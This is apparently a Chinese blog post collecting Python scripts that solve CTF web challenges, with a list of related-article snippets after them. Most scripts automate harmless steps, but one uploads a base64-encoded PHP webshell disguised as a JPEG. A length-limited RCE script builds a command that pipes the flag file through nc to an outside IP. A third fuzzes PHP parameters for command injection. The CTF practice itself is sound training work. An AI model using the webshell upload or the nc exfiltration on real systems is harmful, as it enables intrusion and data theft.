web request python脚本

原创 已于 2023-12-14 21:13:15 修改 · 199 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

于 2023-09-17 11:22:56 首次发布

 bugku 速度要快

import requests
import base64
 
url = 'http://123.206.87.240:8002/web6/'
req = requests.session()
res = req.get(url)
flag = res.headers['flag']
 
txt = base64.b64decode(flag)
txt=txt.decode()
txt = txt[txt.index(":") + 2:]
txt = base64.b64decode(txt)
 
data = {'margin': txt}
ans = req.post(url, data)
print ans.content

bugku 秋名山车神

import requests
import re
 
url='''http://114.67.175.224:18471'''
 
#創建一個session,帮我们跨请求保持某些参数,也会在同一个session实例发出的所有请求之间保持cookies
session1=requests.session()
 
#获取返回数据包信息
response_get=session1.get(url)
 
#匹配1232131231-123123123-12312321算数表达式
result=re.search(r'(\d+[+\-*])+(\d+)',response_get.text)
#print(result)
 
#获得算数表达式匹配结果
expressions=result.group()
#eval()--执行()代码
myvalue=eval(expressions)
 
#创建一个字典
key = {'value':myvalue}
#用post方法传上去
flag=session1.post(url,data=key)
print(flag.text)

3.typingtrain 直接用get 

4.组委会模拟器

import requests
import re
from time import sleep
from json import dumps

req=requests.session()
url='http://202.38.93.111:10021/api/' # 修改
headers={ #修改Cookie
    'Content-Type':"application/json",
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
        'Cookie':"session=eyJ0b2tlbiI6IjMxODg6TUVVQ0lRRHM1K1FnYVRxTElaSmRBazBrWTFwRGtTMUV6dlZIeXZYTTlRZjZyOWJvbEFJZ0VWK2pxbTVId01ZdlJ2VHBOcUNaK1g4QnpHKzNiU1JYWlpvbTlmVEltNmM9In0.ZUSqYA.8ZuTpsbEuBhu3yvHkSmNuLz_RR8"}

res=req.post(url=url+"getMessages",headers=headers)
delays=re.findall(r'"delay":(.*?),',res.text) #提取所有消息的延迟
comm=re.findall(r'"text":(.*?)"}',res.text)#提取所有消息的内容
# print(len(comm))
t=0

for i in range(len(comm)):
    if re.search(r'hack\[(.*?)\]',comm[i]):
        sleeptime=(float(delays[i])-t)*0.955
        # 延迟时间=下一条信息的时间-上一条信息的时间
        # 考虑到程序本身执行的延迟,乘上一个小于1的倍率
        sleep(sleeptime)
        t=float(delays[i])
        data={"id":i}
        print(data)
        # 由于delete以post提交json表单,所以使用dumps序列化data
        del_=req.post(url=url+'deleteMessage',headers=headers,data=dumps(data))
        print(del_.text)

sleep(2)
res=req.post(url=url+"getflag",headers=headers)
print(res.text)

import re
import time
import requests

s = requests.Session()
s.cookies.set('session', '')

r = s.post('http://202.38.93.111:10021/api/getMessages')
messages = r.json()['messages']
t0 = time.time()

for i in range(1000):
    message = messages[i]
    if re.search(r'hack\[[a-z]+\]', message['text']) is None:
        continue
    while t0+message['delay'] > time.time():
        continue
    r = s.post('http://202.38.93.111:10021/api/deleteMessage', json={'id': i})
    print(f'{i}: {r.json()}')

r = s.post('http://202.38.93.111:10021/api/getflag')
print(r.json())

5.高明的·黑客:多线程,一次性发送全部参数

import os
import requests
import re
import threading
import time
print('开始时间:  '+  time.asctime( time.localtime(time.time()) ))
s1=threading.Semaphore(100)  							  			#这儿设置最大的线程数
filePath = r"D:/soft/phpstudy/PHPTutorial/WWW/src/"
os.chdir(filePath)													#改变当前的路径
requests.adapters.DEFAULT_RETRIES = 5								#设置重连次数,防止线程数过高,断开连接
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False											 # 设置连接活跃状态为False
def get_content(file):
    s1.acquire()												
    print('trying   '+file+ '     '+ time.asctime( time.localtime(time.time()) ))
    with open(file,encoding='utf-8') as f:							#打开php文件,提取所有的$_GET和$_POST的参数
            gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
            posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
    data = {}														#所有的$_POST
    params = {}														#所有的$_GET
    for m in gets:
        params[m] = "echo 'xxxxxx';"
    for n in posts:
        data[n] = "echo 'xxxxxx';"
    url = 'http://127.0.0.1/src/'+file
    req = session.post(url, data=data, params=params)			#一次性请求所有的GET和POST
    req.close()												# 关闭请求  释放内存
    req.encoding = 'utf-8'
    content = req.text
    #print(content)
    if "xxxxxx" in content:									#如果发现有可以利用的参数,继续筛选出具体的参数
        flag = 0
        for a in gets:
            req = session.get(url+'?%s='%a+"echo 'xxxxxx';")
            content = req.text
            req.close()												# 关闭请求  释放内存
            if "xxxxxx" in content:
                flag = 1
                break
        if flag != 1:
            for b in posts:
                req = session.post(url, data={b:"echo 'xxxxxx';"})
                content = req.text
                req.close()												# 关闭请求  释放内存
                if "xxxxxx" in content:
                    break
        if flag == 1:													#flag用来判断参数是GET还是POST,如果是GET,flag==1,则b未定义;如果是POST,flag为0,
            param = a
        else:
            param = b
        print('找到了利用文件: '+file+"  and 找到了利用的参数:%s" %param)
        print('结束时间:  ' + time.asctime(time.localtime(time.time())))
    s1.release()

for i in files:															#加入多线程
   t = threading.Thread(target=get_content, args=(i,))
   t.start()

6.计算器

import re
import requests
url='http://node4.anna.nssctf.cn:28531/'
session保持会话
s=requests.session()
num=64912893 + 89266395
data={'answer':num}
res=s.post(url=url,data=data)
res.encoding='utf-8'
exp=re.findall('<br>(\d+.*\d+)<br>',res.text)[0]
num=eval(exp)
for i in range(1011):
    print(num)
    data={'answer':num}
    res=s.post(url=url,data=data)
编码防止中文乱码
    res.encoding='utf-8'
    print(res.text)
    if i >= 1000:
        print(res.text)
    if 'flag{' in res.text:
        flag=re.findall('flag{.*}',res.text)[0]
        print(flag)
        break
    else :
        exp=re.findall('<br>(\d+.*\d+)<br>',res.text)[0]
        num=eval(exp)
        print(num)
        print(i)

7. guss who am I

import requests

answer = [
   {
        "id": "陈斩仙",
        "intro": "什么都不会 / 咸鱼研究生 / <del>安恒</del>、<del>长亭</del> / SJTU",
        "url": "https://mxgcccc4.github.io/"
    },
    {
        "id": "Eric",
        "intro": "渗透 / 人工智能 / 北师大博士在读",
        "url": "https://3riccc.github.io"
    }
]
s = requests.session()
for i in range(200):
    getscore = "http://week-1.hgame.lwsec.cn:32703/api/getScore"
    getquestion = 'http://week-1.hgame.lwsec.cn:32703/api/getQuestion'
    verifyanswer = "http://week-1.hgame.lwsec.cn:32703/api/verifyAnswer"
    r1 = s.get(getscore)
    if "hgame" in r1.text:
        print(r1.json()["message"])
        break
    else:
        r2 = s.get(getquestion)
        data1 = r2.json()
        find_id=data1["message"]
        for j in answer:
            if find_id in j.values():
                id = j["id"]
                break
        data = {"id":id}
        r3 = s.post(verifyanswer,data=data)
        if "Correct answer!" in r3.text:
            print(f"第{i+1}次正确")

8.上传文件

import requests
import base64
 
content = b"""aaaPD9waHAgZXZhbCgkX1JFUVVFU1RbOF0pOz8+"""
 
url = "http://43.142.108.3:28571/Ns_SCtF.php
 
data = {"submit": "Submit"}
files = {'file': ('1.php', content, 'image/jpeg')}
resp = requests.post(url, data=data, files=files)
print(resp.text)

长度限制rce:

import time,requests
#7长度命令执行

baseurl="   /?cmd="
s=requests.session()
#cat flag|nc 192.168.1.161 7777
list=[
    '>7777',
    '>1\%20\\',
    '>16\\',
    '>1.\\',
    '168.\\',
    '2.\\',
    '>19\\',
    '>c\%20\\',
    '>\|n\\',
    '>ag\\',
    'fl\\',
    '>t\ \\',
    'ca\\',
    'ls -t>a'
]
for i in list:
    time.sleep(1)
    url=baseurl+str(i)
    s.get(url)
s.get(baseurl+'sh a')

在手机运行python脚本程序
吾名招财的博客
09-22 1070
在手机运行注册机python脚本程序引言二级目录 引言   之前实现了web版的python软件授权注册机系统,可以通过浏览器直接访问注册机页面进行注册码的生成,但是这还需要搭建一台服务器用来运行自己的web服务,前面也尝试过将python的注册机界面程序编译成手机应用如ios及apk格式文件,但是也都没有成功。   最近突然发现了完全可以在手机直接运行python脚本实现我们的注册机方法。就是下载一个可以在手机运行的模拟Linux的终端软件,这两个软件都是免费的,可以放心使用,在安卓手机可以下载Termu
python编写web漏洞扫描器_Python脚本实现Web漏洞扫描工具
weixin_35965051的博客
01-13 1971
前言本文的文字及图片来源于网络,仅供学习、交流使用,不具有任何商业用途,如有问题请及时联系我们以作处理。PS:如有需要Python学习资料的小伙伴可以加下Python快乐交流群:1136201545一、使用说明:1.运行环境:Linux命令行界面+Python2.72.程序源码:Vim scanner//建立一个名为scanner的文件Chmod a+xscanner//修改文件权限为可执行的3....
python WEB接口自动化测试之requests库详解
测试界的彭于晏的博客
09-23 789
前提: requests库是python的第三方库,需要提前安装哦,可以直接用pip命令:python –m pip install requests 按照惯例,先将requests库的属性打印出来,看看哪些属性。 >>> import requests >>> dir(requests) #查看requests库的属性 ['ConnectionError', 'HTTPError', 'NullHandler', 'PreparedReq
Python | Web | request模块使用不完全总结
MissMango0820的博客
07-27 415
本文总结 web 开发中 request 模块使用的不完全总结。
Python实现Web请求与响应
最新发布
2403_86763298的博客
06-13 611
客户端(如浏览器、手机 App)向服务器发送的数据获取或操作请求,本质是符合 HTTP 协议格式的数据包。服务器接收到请求后,处理并返回给客户端的结果数据,同样遵循 HTTP 协议格式。
PythonWeb请求:requests库入门与应用
萧鼎的博客
11-12 811
requests本文介绍了requests库的基本用法和高级应用,包括GET和POST请求、请求头、错误处理、文件上传下载等操作。通过requests库,你可以轻松地完成Web数据采集、API集成、文件处理等任务,是Python开发者必备的工具之一。希望本教程能帮助你掌握requests库的使用,并灵活应用到实际项目中!
python web开发-flask中访问请求数据request
挨踢学霸
03-20 1920
Request对象在web应用的开发中是一个非常重要的对象,主要用来获取用户发来的请求数据。常用属性参考:http://docs.jinkan.org/docs/flask/api.html#flask.request下面我们以一个表单提交的例子来说明一些常用request属性的使用。1.      创建一个表单的template在templates文件夹下面创建form.html模板文件,输入下...
使用Python脚本实现Web漏洞扫描
07-19
### 使用Python脚本实现Web漏洞扫描的关键知识点 #### 一、背景介绍 随着互联网技术的飞速发展,网络安全成为了一个不容忽视的问题。Web应用程序作为互联网服务的重要组成部分,其安全性直接影响到用户的数据安全和...
python 漏洞扫描_Python脚本实现Web漏洞扫描工具
weixin_39793576的博客
12-15 2803
这是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的。以下是使用说明和源代码。一、使用说明:1.运行环境:Linux命令行界面+Python2.72.程序源码:Vim scanner//建立一个名为scanner的文件Chmod a+xscanner//修...
【信息收集】python脚本实现模拟登录
m0_71944965的博客
08-31 345
该代码段使用requests库向一个指定的URL发送POST请求
python web requests
qq_37312720的博客
10-14 238
requests库里面直接就有请求方法post和get等,不用像urlopen处理请求那样冗余 import requests r = requests.get('https://www.baidu.com/') print(type(r)) print(r.status_code) print(type(r.text)) print(r.text) print(r.cookies) 这样...
python web.py服务器与客户端
叶子的博客
08-19 4915
web.py是python中一个相对容易上手的web服务器搭建工具。web.py默认端口为8080端口,但是有时候8080已经被占用了,所以需要自定义端口。另一种方式是按照上述代码的方式,重载web.application类。
Python网页请求库Requests
公众号:瑞行AI
10-10 879
Requests库官方中文文档 http://cn.python-requests.org/zh_CN/latest/# coding:utf-8 Python2加 # 用requests库发送各种请求import requests #Requests拥有了urllib3的所有特性,Requests支持HTTP连接保持和连接池,支持使用cookie保持会话,支持文件上传,支持自动确定响应内容的编码
关于python webpy的request
cxs812760493的博客
01-01 118
获取get值i = web.input()keyword = i.get('keyword')判断get值是否存在if i.has_key('keyword')
python web get_如何在Python中发送HTTP Get Web Request
weixin_39531037的博客
12-17 194
I am having trouble sending data to a website and getting a response in Python. I have seen similar questions, but none of them seem to accomplish what I am aiming for.This is my C# code I'm trying to...
python 爬虫 访问网页之requestrequests:
IT_arookie的博客
09-23 4528
标签(空格分隔): 9.23 一、访问获取网页的基本方法: 准备头部和代理 user_agent = [ #准备头部,列表 &amp;quot;Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50&amp;quot;, &amp;quot;Mo...
web界面 怎么跟python脚本联合
12-02
Web界面与Python脚本的联合通常通过API(应用程序接口)来实现。以下是一个基本的过程: 1. **创建Python API**: Python可以提供RESTful API、Flask、Django等框架来处理HTTP请求。你可以编写一个Python函数,接收...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

El.十一

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值